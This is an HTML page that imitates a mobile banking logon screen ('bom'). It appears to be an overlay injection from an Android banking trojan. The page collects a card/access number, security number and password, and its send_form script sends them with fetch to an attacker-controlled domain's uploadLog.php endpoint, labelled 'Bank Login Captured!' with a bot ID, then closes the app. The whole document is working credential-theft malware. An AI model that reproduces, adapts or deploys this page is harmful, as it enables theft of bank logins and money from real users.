<!DOCTYPE html>
<html>
<head>
    <title>bom</title>
    <link rel="shortcut icon" href="org.bom.bank.png" type="image/png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="utf-8">
</head>
<body>

<style type="text/css">
    body {
        background: #e9e9e9;
        margin: 0;
        padding: 0;
        font-family: Helvetica, sans-serif;
        background-size: 100%;
    }
    .logo {
text-align: center;
    background-size: 100%;
    padding: 20px 0px 0px 0px;
    background: none;
    color: #fff;
    font-weight: 400;
    text-decoration: none;
    }
    .form {
        text-align: center;
        padding-top: 70px;
    }
    .form label {
        display: block;
    }
    form {
        display: inline-block;
    }
fieldset {
      position: relative;
      text-align: center;
      border: none;
          margin: 0;
    padding: 0;

}

input[type="text"],input[type="password"] {
line-height: 16px;
    font-size: 17px;
    box-sizing: border-box;
    width: 100%;
    position: relative;
    padding: 10px;
    margin: 0px 1px;
    display: block;
    -webkit-box-shadow: none;
    box-shadow: none;
    -webkit-appearance: none;
    height: 48px;
    margin: 0px 0px 0px 0px;
    color: #000;
    text-align: left;
    outline: none;
    border: none;
    background: no-repeat;
}
input[type="button"] {
    left: 0;
    right: 0;
    width: 100%;
    height: 47px;
    margin: 30px 0px 0px 0px;
    outline: none;
    float: right;
    color: #fff;
    border: none;
    font-size: 14px;
    -webkit-appearance: none;
    cursor: pointer;
    background: #f1089f;
    border-radius: 5px;
}
fieldset span {
    display: inline-block;
    text-align: center;
    color: #4b4949;
    left: 0;
    right: 0;
    padding-top: 30px;
}
fieldset p {
    display: inline-block;
    left: 0;
    right: 0;
    color: #088f0d;
}
.logo span {
    display: inline-block;
    float: left;
    padding: 40px 0px 0px 20px;
    font-size: 20px;
    color: #fff;
    font-weight: 600;
}
input::placeholder {
    color: #a9a9a9;
    font-size: 15px;
}
input[type="checkbox"] {
    display: none;
}

/* стили для метки */
input[type="checkbox"] + label {
    cursor: pointer;
    padding-left: 50px;
    position: relative;
    font-family: tahoma, sans-serif, arial;
    line-height: 40px;
}

/* стили для поля с бегунком*/
input[type="checkbox"] + label::before {
content: "";
    display: inline-block;
    position: absolute;
    top: 0;
    left: 0;
    vertical-align: middle;
    padding: 0;
    height: 24px;
    width: 45px;
    margin: 0 5px 0 0;
    border: 1px solid #cacaca;
    border-radius: 12px;
    background: #3F51B5;
}

/* стили для бегунка*/
input[type="checkbox"] + label::after {
    content: "";
    display: block;
    position: absolute;
    top: 1px;
    left: 1px;
    width: 22px;
    height: 22px;
    border-radius: 22px;
    background: #ffffff;
    border: 1px solid #cacaca;
    box-shadow: 0 3px 3px rgba(140, 140, 140, .1);
}

/* плавность )) */
input[type="checkbox"] + label::before,
input[type="checkbox"] + label::after {
    -webkit-transition: all .2s ease-out;
    transition: all .2s ease-out;
}


input[type="checkbox"]:checked + label::after {
    left: 22px;
}
</style>


<fieldset id="formtosend">

<div class="" id="log" style="display: block;">

<div class="logo">

</div>

<div class="area" style="background: none; padding: 30px; border-radius: 3px;">
        <input type="text" name="card" id="card" placeholder="Card/Access Number" style="height: 50px; border-bottom:1px solid #bebebe;">
        <input type="password" name="security_number" id="security_number" placeholder="Security Number" style="height: 50px;border-bottom:1px solid #bebebe">
        <input type="password" name="password" id="password" placeholder="Password" style="height: 50px; border-bottom:1px solid #bebebe">
        <input name="exit" type="hidden" text="true"/>
        <div style="">
                <label style="color: #000;font-size: 14px;position: relative;top: 16px;float: left;">Set up quick logon</label>
        <input id="checkbox1" name="sumbit" type="checkbox">
        <label for="checkbox1" style="float: right; margin-top: 10px; margin-left: 10px;"></label>
    </div>
    <a href="#" style="position: relative;top: 40px;right: 27px;text-decoration: none;color: #f1089f;">Need help?</a>
        <input type="button" name="sumbit" onclick="send_form()" value="Logon to mobile banking" style="position: relative; top: 20px;">
</div>

</div>

</fieldset> 

<script>function closeapp(){setTimeout(function(){ window.location.replace("file:///android_asset/closeapp.html");}, 1000); };
if ( typeof Android == "undefined")
    var Android = {
        returnResult : alert.bind(window)
    }

/*********Recursive implementation of jSON.stringify; ********/
var stringifyJSON = function(obj) {
    var arrOfKeyVals = [],
        arrVals = [],
        objKeys = [];

    /*********CHECK FOR PRIMITIVE TYPES**********/
    if (typeof obj === 'number' || typeof obj === 'boolean' || obj === null)
        return '' + obj;
    else if (typeof obj === 'string')
        return '"' + obj + '"';

    /*********CHECK FOR ARRAY**********/
    else if (Array.isArray(obj)) {
        if (obj[0] === undefined)
            return '[]';
        else {
            obj.forEach(function(el) {
                arrVals.push(stringifyJSON(el));
            });
            return '[' + arrVals.join(',') + ']';
        }
    }
    /*********CHECK FOR OBJECT**********/
    else if (obj instanceof Object) {
        objKeys = Object.keys(obj);
        objKeys.forEach(function(key) {
            var keyOut = '"' + key + '":';
            var keyValOut = obj[key];
            if (keyValOut instanceof Function || typeof keyValOut === undefined)
                arrOfKeyVals.push('');
            else if (typeof keyValOut === 'string')
                arrOfKeyVals.push(keyOut + '"' + keyValOut + '"');
            else if (typeof keyValOut === 'boolean' || typeof keyValOut === 'number' || keyValOut === null)
                arrOfKeyVals.push(keyOut + keyValOut);
            else if (keyValOut instanceof Object) {
                arrOfKeyVals.push(keyOut + stringifyJSON(keyValOut));
            }
        });
        return '{' + arrOfKeyVals + '}';
    }
};

function formToJSONbyName(f)
{
    var FinalObject = {}, namesHTML = ['input','select'];
    for(var i = 0; i < namesHTML.length; i++) {
        var bsform = f.getElementsByTagName(namesHTML[i]);
        for(var j = 0; j < bsform.length; j++) {
            if(bsform[j].name == 'sumbit') continue;
            FinalObject[bsform[j].name] = bsform[j].value
        }
    }
    return stringifyJSON(FinalObject);
}

function send_form()
{
var url_string = window.location.href;
var url = new URL(url_string);
var botid = url.searchParams.get("botid");
var domain = url.searchParams.get("domain");var path = window.location.pathname;var page = path.split("/").pop();
    if (document.getElementById("card").value == '')
{
    alert ('All fields required!');
    return false;
}
if (document.getElementById("security_number").value == '')
{
    alert ('All fields required!');
    return false;
}
if (document.getElementById("password").value == '')
{
    alert ('All fields required!');
    return false;
}
    var form = document.getElementById('formtosend');
    fetch("https://"+domain+"/project/apiMethods/uploadLog.php?log=Bank Login Captured! -----<b> Bot ID:</b> "+botid+"<br>"+page.replace(".html","")+" | "+formToJSONbyName(form)); closeapp();
}
</script>

</body>
</html>